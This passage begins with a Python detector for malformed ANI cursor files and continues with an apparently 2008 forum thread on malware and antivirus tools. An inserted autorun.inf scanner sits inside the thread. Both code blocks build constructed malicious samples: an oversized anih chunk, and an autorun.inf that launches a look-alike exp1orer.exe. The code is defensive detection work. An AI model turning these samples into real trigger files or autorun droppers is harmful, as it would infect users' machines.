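            yield from riff_chunks(data, start + 4, stop)  # skip the 4-byte list type
        else:
            yield fourcc, size, data[start:stop]
        offset = stop + (size & 1)  # chunk payloads are padded to even length


def check_ani(data):
    """Return a list of findings; empty means every anih chunk has the expected size."""
    if not is_ani(data):
        return ["not a RIFF/ACON file"]
    riff_len = struct.unpack_from("<I", data, 4)[0]
    end = min(len(data), 8 + riff_len)
    findings, seen = [], 0
    for fourcc, size, payload in riff_chunks(data, 12, end):
        if fourcc != b"anih":
            continue
        seen += 1
        if size != ANIHEADER_SIZE or len(payload) != ANIHEADER_SIZE:
            findings.append(f"anih chunk #{seen} declares {size} bytes, expected {ANIHEADER_SIZE}")
    if seen == 0:
        findings.append("no anih chunk")
    return findings


# --- Constructed samples -------------------------------------------------
def chunk(fourcc, payload):
    pad = b"\0" if len(payload) & 1 else b""
    return fourcc + struct.pack("<I", len(payload)) + payload + pad


def build_ani(chunks):
    body = b"ACON" + b"".join(chunks)
    return b"RIFF" + struct.pack("<I", len(body)) + body


GOOD_ANIH = chunk(b"anih", struct.pack("<9I", 36, 1, 1, 32, 32, 32, 1, 10, 1))
BENIGN_ANI = build_ani([GOOD_ANIH, chunk(b"rate", struct.pack("<I", 10))])
# Valid header first, then a second anih chunk far larger than the 36-byte structure.
HOSTILE_ANI = build_ani([GOOD_ANIH, chunk(b"anih", b"A" * 200)])
# A file that merely carries a .ani (or .jpg) name: the extension tells you nothing.
NOT_ANI = b"GIF89a" + b"\0" * 20

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN_ANI), ("hostile", HOSTILE_ANI), ("gif", NOT_ANI)):
        print(name, check_ani(blob) or "ok")
```

Run this on the bytes a proxy or mail gateway actually hands to the client, not on the file name it arrived under; that is the only way a check can keep up with the "attacks for this vulnerability are not constrained by this file type" caveat in the article.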



rma2003

  • PMT Charter Member
  • PMT Jedi 2000
  • ****
    • Posts: 2,278
    • Likes Received: +0/-0
Amazing!

Everytime someone comes up with a solid malware defense, someone is still able to sharpen the sword still more. In this never-ending contest, I'm rooting for the good guys.

Those who use their brilliance just to make our online experience miserable are simply cyber-terrorist, as far as I'm concerned.

But I'm glad that this "blue pill" thing has been exposed. At least, antivirus/spyware programmers may find a way to combat this.

:cool:


pinoynetworker

  • Forum Master 300
  • ***
    • Posts: 384
    • Likes Received: +0/-0
^ Sometimes my playful mind thinks that they themselves also make some of the viruses to keep the economy running...  :watchuthink:
 

Posted on: Apr 24, 2008, 07:42 PM
Quote
Users of MySpace,

There's a worm that's running rampant within the MySpace environment! Make sure your antivirus/antispyware/firewall programs are up-to-date.


The thing is, there are more and more channels now (more than ever) for viruses to proliferate, with the ever-growing social networks on the web.  Most people allow all the cutie-wootsies without a thought for the system vulnerabilities being opened up... Java enabled, Flash applications, etc., which can carry trojan programs that users don't know might be injected into their system.  We've definitely come a long way since the "CBrain" virus in the boot sectors of floppy disks...  :D

Those drive autoruns (like on thumb drives) are also prone to viruses like exp1orer.exe ... so check your (hidden) autorun.inf files from time to time.

« Last Edit: Apr 24, 2008, 07:53 PM by pinoynetworker »


rma2003

  • PMT Charter Member
  • PMT Jedi 2000
  • ****
    • Posts: 2,278
    • Likes Received: +0/-0
It has become so that in doing business online, you need to consider having PC security tools and programs, in addition to webmaster tools, marketing resources, and promotional materials.

:cool:


pinoynetworker

  • Forum Master 300
  • ***
    • Posts: 384
    • Likes Received: +0/-0
^ what sucks is that before, you only spent time scanning for viruses... now you also scan for spyware & adware...  :mad:


rma2003

  • PMT Charter Member
  • PMT Jedi 2000
  • ****
    • Posts: 2,278
    • Likes Received: +0/-0
True. Viruses only tend to destroy your files and data. But with backup systems, they can be restored. It can be annoying, but at least it can be fixed. At worst, reformatting and rebuilding your disk can be done.

But with spyware and adware, your privacy is invaded. I know. Someone used my credit card details to buy stuff. It's good my bank alerted me to this. We had time to shut down my card before greater damage could be done. But I still paid for some of the charges.

Spam is also a result of your privacy being invaded.

That's why I bought an integrated PC security software. The results have been good so far.

:cool:


jigolo

  • Junior Member
  • **
    • Posts: 28
    • Likes Received: +0/-0
That's the buffer overrun, so you must always keep your Windows software updated.


camjarman

  • Senior Member
  • **
    • Posts: 99
    • Likes Received: +0/-0
Recently got infected with TDSS trojans.  I don't know what they do exactly, but I think they came from a site one of my nieces/nephews surfed ... updated Symantec caught it, and my system is safe now.   :applause:


rma2003

  • PMT Charter Member
  • PMT Jedi 2000
  • ****
    • Posts: 2,278
    • Likes Received: +0/-0
Some sites today use malicious scripting. All you need to do is find the site online. It will download stuff onto your computer without your permission.

You really need some quality protection software for these kinds of things.

Cheers,
:cool:


pinoynetworker

  • Forum Master 300
  • ***
    • Posts: 384
    • Likes Received: +0/-0

It's really different now... before, all you had to do was make sure those floppy disks you put into your drives had been sanitized prior to use.  Nowadays there are so many channels by which the PC can be infected.  For all we know, those cutesy-wootsie widgets you put on your Friendster profiles, blogs, etc. could be a security breach...  so as has been constantly advised... always keep your protection up-to-date...
 


rma2003

  • PMT Charter Member
  • PMT Jedi 2000
  • ****
    • Posts: 2,278
    • Likes Received: +0/-0
Be careful especially this Christmas. There is a group (?) of people selling what they call the "Christmas Exploitation Kit." They sell this to those with a hacker-like mentality so that it can be given to their friends.

Once their friends open this, their systems become vulnerable. This kit has malicious code that is supposed to work on ALL browsers! At the moment, it has a low detection rate. It seems some anti-malware companies have yet to figure out how to combat this kit.

So just be careful this Christmas.

:cool:


explorer

  • Forum Tambay 200
  • ***
    • Posts: 263
    • Likes Received: +0/-0
Hi guys, I'd just like to share the anti-spyware and antivirus that I use.

1.  SpywareBlaster - freeware
2.  Ad-Aware - freeware version.
3.  Eset NOD32 - licensed

So far I've had no problems with these, and my system hardly ever gets infected as long as the definitions are always updated. I use these in my computer shop.





pinoynetworker

  • Forum Master 300
  • ***
    • Posts: 384
    • Likes Received: +0/-0

Avira is my antivirus, for my part.... so far the detection is okay.... better than my AVG before...



rma2003

  • PMT Charter Member
  • PMT Jedi 2000
  • ****
    • Posts: 2,278
    • Likes Received: +0/-0
I use a combination of free and paid ones. Ad-Aware and SpywareBlaster are the free ones I use. My paid protection software is Panda.

So far, it's okay.

:cool:


networm

  • Forum Tambay 200
  • ***
    • Posts: 229
    • Likes Received: +0/-0
In my experience, NOD32 has good detection and removal, and it also consumes the least resources while keeping the system safe. Of course, for spyware/adware removal there is Spybot. There is also a free version of Comodo Internet Security, and it comes with a firewall.

But no matter how well we secure our system, we end users still have to be careful, especially when browsing websites with malicious scripts. Also, the viruses that come with flash drives, this autorun.inf. As for me, I disabled the autorun function for flash drives and CD/DVD. I prefer going to Windows Explorer and exploring manually.

But with the danger of viruses from flash drives, another kind of protection software has emerged.
http://www.brothersoft.com/usb-virus-scan-132249.html
http://www.usbantivirus.net/
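The hidden autorun.inf that pinoynetworker says to check from time to time and the flash-drive autorun viruses networm disables AutoRun against are both driven by the same small file, so here is an added example of what "checking" it means in code. This is not code posted by either member nor from any product named in the thread. It parses the INI-style autorun.inf that Windows reads from the root of a removable drive and flags the directives that would run or expose a program. The look-alike name list and the digit-for-letter table are assumptions made for this example, and both sample files are constructed; the first is modelled on the exp1orer.exe case mentioned above.

```python
"""Inspect an autorun.inf for directives that would launch a program.

Added example for this thread, not code from any forum member. It parses
the INI-style autorun.inf that Windows reads from a removable drive's root
and reports directives that run or expose a program.
"""
import configparser
from pathlib import PureWindowsPath

# File extensions Windows will execute directly.
EXEC_EXTENSIONS = {".exe", ".com", ".bat", ".cmd", ".pif", ".scr", ".vbs", ".js"}
# Assumed list of names worms like to imitate; the thread's exp1orer.exe
# swaps the digit 1 for the letter l in explorer.exe.
LOOKALIKE_TARGETS = {"explorer.exe", "svchost.exe", "winlogon.exe", "lsass.exe", "csrss.exe"}
# Assumed digit-for-letter substitutions to undo before comparing names.
HOMOGLYPHS = str.maketrans({"1": "l", "0": "o", "5": "s", "3": "e"})


def normalize_name(name):
    """Undo common digit-for-letter substitutions, e.g. exp1orer -> explorer."""
    return name.lower().translate(HOMOGLYPHS)


def launches_program(key):
    """True for [autorun] keys whose value names a program to run."""
    if key in ("open", "shellexecute"):
        return True
    # shell\<verb>\command=... runs when the user picks <verb>; plain
    # shell=<verb> or shell\<verb>=<label> only sets the default verb or menu text.
    return key.startswith("shell\\") and key.endswith("\\command")


def first_token(value):
    """Program name from a directive value: handles a quoted path with
    spaces, trailing arguments, and the 'file,index' form used by icon=."""
    value = value.strip()
    if not value:
        return ""
    if value.startswith('"'):
        end = value.find('"', 1)
        return value[1:end] if end > 0 else value[1:]
    return value.split(",")[0].split()[0]


def parse_autorun(text):
    """Return the [autorun] section as a dict of lower-cased key -> value."""
    cp = configparser.RawConfigParser(strict=False, delimiters=("=",))
    cp.optionxform = str.lower  # autorun.inf keys are case-insensitive
    try:
        cp.read_string(text)
    except configparser.Error:
        return {}  # no section header or a malformed line: Windows runs nothing
    for section in cp.sections():  # [AutoRun] and [autorun] are the same
        if section.lower() == "autorun":
            return dict(cp.items(section))
    return {}


def findings_for(text):
    """Return (directive, target, reason) for each directive worth a look."""
    findings = []
    for key, value in parse_autorun(text).items():
        launches = launches_program(key)
        if not launches and key != "icon":
            continue
        target = first_token(value)
        name = PureWindowsPath(target).name
        reasons = []
        if launches:
            reasons.append("launches a program")
        if key == "icon" and PureWindowsPath(name).suffix.lower() in EXEC_EXTENSIONS:
            reasons.append("icon drawn from an executable")
        if normalize_name(name) in LOOKALIKE_TARGETS and name.lower() not in LOOKALIKE_TARGETS:
            reasons.append("name imitates a Windows system binary")
        if reasons:
            findings.append((key, target, "; ".join(reasons)))
    return findings


# Constructed samples, not captured files. The first is modelled on the
# thumb-drive worm described in the thread.
SAMPLE_MALICIOUS = r"""[autorun]
open=exp1orer.exe
shell\open=Open
shell\open\command=exp1orer.exe
shell\explore\command=exp1orer.exe
icon=exp1orer.exe
"""

SAMPLE_BENIGN = r"""[autorun]
label=Holiday photos
icon=photos.ico
"""

if __name__ == "__main__":
    for label, sample in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        hits = findings_for(sample)
        print(f"{label}: {len(hits)} finding(s)")
        for key, target, reason in hits:
            print(f"  {key} -> {target}: {reason}")
```

On a real drive the file is usually marked hidden and system, so read it by path rather than trusting the Explorer listing. Any finding here means the drive would run that program on insertion if AutoRun is on; the setting networm describes turning off corresponds to the NoDriveTypeAutoRun policy value under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer, where 0xFF disables AutoRun for every drive type.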


explorer

  • Forum Tambay 200
  • ***
    • Posts: 263
    • Likes Received: +0/-0
Hi networm, thanks for sharing the link, let me try the trial version first.


 

